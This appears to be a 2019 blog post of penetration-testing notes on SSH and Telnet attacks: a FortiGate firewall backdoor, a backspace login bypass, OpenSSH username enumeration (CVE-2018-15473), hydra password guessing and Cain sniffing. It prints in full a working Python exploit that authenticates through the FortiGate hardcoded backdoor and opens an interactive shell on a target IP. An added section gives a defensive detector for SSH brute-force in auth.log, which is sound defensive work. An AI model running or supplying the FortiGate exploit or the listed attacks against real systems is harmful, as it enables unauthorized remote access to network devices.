Ports and Services 2

ssh

1. Setup: ships with Linux

2. Classic vulnerabilities

2.1 Firewall SSH backdoor: https://www.secpulse.com/archives/69093.html
2.2 28 backspaces: at the username prompt, press Backspace 28 times in a row https://www.ithome.com/html/it/195990.htm
2.3 OpenSSH username enumeration, CVE-2018-15473 (https://www.anquanke.com/post/id/157607)
Summary:
1. Download the PoC: http://www.openwall.com/lists/oss-security/2018/08/16/1
2. Run ssh-check-username.py 192.168.8.103 <an existing username>
3. Check the returned result
4. Run ssh-check-username.py 192.168.8.103 <a nonexistent username>
5. Check the returned result
6. Principle

2.4 鹏博士 broadband FortiGate firewalls have an SSH backdoor (script attached)
Summary:
1. matt's script:
#!/usr/bin/env python
# SSH Backdoor for FortiGate OS Version 4.x up to 5.0.7
# Usage: ./fgt_ssh_backdoor.py <target-ip>
# (Python 2 script: it relies on the print statement and on str holding raw bytes.)

import socket
import select
import sys
import paramiko
from paramiko.py3compat import u
import base64
import hashlib
import termios
import tty


def custom_handler(title, instructions, prompt_list):
    # Answer the keyboard-interactive challenge: 'AK1' plus base64 of 12 zero
    # bytes followed by SHA-1(zeros || challenge + fixed string || fixed bytes).
    n = prompt_list[0][0]
    m = hashlib.sha1()
    m.update('\x00' * 12)
    m.update(n + 'FGTAbc11*xy+Qqz27')
    m.update('\xA3\x88\xBA\x2E\x42\x4C\xB0\x4A\x53\x79\x30\xC1\x31\x07\xCC\x3F\xA1\x32\x90\x29\xA9\x81\x5B\x70')
    h = 'AK1' + base64.b64encode('\x00' * 12 + m.digest())
    return [h]


def main():
    if len(sys.argv) < 2:
        print 'Usage: ' + sys.argv[0] + ' <target-ip>'
        exit(-1)

    client = paramiko.SSHClient()
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())

    # connect() is only used to bring up the transport; its own authentication
    # attempt is caught and ignored, and the transport is authenticated by hand below.
    try:
        client.connect(sys.argv[1], username='', allow_agent=False, look_for_keys=False)
    except paramiko.ssh_exception.SSHException:
        pass

    trans = client.get_transport()
    try:
        trans.auth_password(username='Fortimanager_Access', password='', event=None, fallback=True)
    except paramiko.ssh_exception.AuthenticationException:
        pass

    trans.auth_interactive(username='Fortimanager_Access', handler=custom_handler)
    chan = client.invoke_shell()

    # Put the local terminal into raw mode and relay bytes between it and the channel.
    oldtty = termios.tcgetattr(sys.stdin)
    try:
        tty.setraw(sys.stdin.fileno())
        tty.setcbreak(sys.stdin.fileno())
        chan.settimeout(0.0)

        while True:
            r, w, e = select.select([chan, sys.stdin], [], [])
            if chan in r:
                try:
                    x = u(chan.recv(1024))
                    if len(x) == 0:
                        sys.stdout.write('\r\n*** EOF\r\n')
                        break
                    sys.stdout.write(x)
                    sys.stdout.flush()
                except socket.timeout:
                    pass
            if sys.stdin in r:
                x = sys.stdin.read(1)
                if len(x) == 0:
                    break
                chan.send(x)

    finally:
        termios.tcsetattr(sys.stdin, termios.TCSADRAIN, oldtty)


if __name__ == '__main__':
    main()
2. python FortiGate.py <ip>
3. Run commands in the resulting shell

3. Attack methods

3.1 Weak passwords: guessing with hydra

3.2 Firewall SSH backdoor

3.3 28 backspaces

3.4 OpenSSH username enumeration, CVE-2018-15473
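The weak-password guessing listed in 3.1 leaves a distinctive trace in sshd's auth.log. As an added example that is not part of the original post, the following Python 3 detector parses constructed sample log lines, flags any source IP that reaches five failed password attempts inside a sliding 60-second window, records the usernames it tried, and marks whether a later login from that IP succeeded. The assumed log format is OpenSSH's "Failed/Accepted password for ... from ... port ... ssh2" line; the hostnames, addresses and timestamps are constructed.

```python
import re
from collections import defaultdict, deque
from datetime import datetime
# Constructed sample sshd auth.log lines (not real traffic): a password-guessing
# burst from one source that ends in a successful login, plus one stray failure.
SAMPLE_LOG = """\
Dec 23 10:30:01 host sshd[2001]: Failed password for root from 192.0.2.10 port 40001 ssh2
Dec 23 10:30:02 host sshd[2002]: Failed password for invalid user admin from 192.0.2.10 port 40002 ssh2
Dec 23 10:30:03 host sshd[2003]: Failed password for root from 192.0.2.10 port 40003 ssh2
Dec 23 10:30:04 host sshd[2004]: Failed password for invalid user test from 192.0.2.10 port 40004 ssh2
Dec 23 10:30:05 host sshd[2005]: Failed password for root from 192.0.2.10 port 40005 ssh2
Dec 23 10:30:06 host sshd[2006]: Accepted password for root from 192.0.2.10 port 40006 ssh2
Dec 23 10:31:00 host sshd[2007]: Failed password for alice from 198.51.100.7 port 50001 ssh2
"""

# OpenSSH password-auth lines; "invalid user" marks a name that does not exist locally.
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: (?P<result>Failed|Accepted) "
    r"password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\d+(?:\.\d+){3}) port \d+ ssh2$")


def parse_line(line, year=2019):
    """Return (timestamp, result, user, ip) or None; syslog omits the year, so one is supplied."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime("%d %s" % (year, m.group("ts")), "%Y %b %d %H:%M:%S")
    return ts, m.group("result"), m.group("user"), m.group("ip")


def detect_bruteforce(log_text, threshold=5, window_s=60):
    """Flag each source IP with >= threshold failures in a sliding window; note later successes."""
    recent = defaultdict(deque)   # ip -> failure timestamps still inside the window
    users = defaultdict(set)      # ip -> every username that source has tried
    alerts = {}
    for line in log_text.splitlines():
        parsed = parse_line(line)
        if parsed is None:
            continue
        ts, result, user, ip = parsed
        if result == "Failed":
            users[ip].add(user)
            q = recent[ip]
            q.append(ts)
            while (ts - q[0]).total_seconds() > window_s:
                q.popleft()
            if len(q) >= threshold:
                hit = alerts.setdefault(ip, {"success_after_flood": False})
                hit["failures"], hit["users"] = len(q), sorted(users[ip])
        elif ip in alerts:   # an Accepted login from an already-flagged source
            alerts[ip]["success_after_flood"] = True
    return alerts
```

A source that is flagged and then logs in successfully is the case worth paging on, since it usually means a guessed password rather than a noisy scanner.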

telnet

Attack methods:
1. Weak passwords: hydra
2. Sniffing with Cain

Reference: https://mp.weixin.qq.com/s/Tg1-puJFgztNqtY9KoMeog

posted @ 2019-12-23 10:30  强壮的脸皮  Views (251)  Comments (0)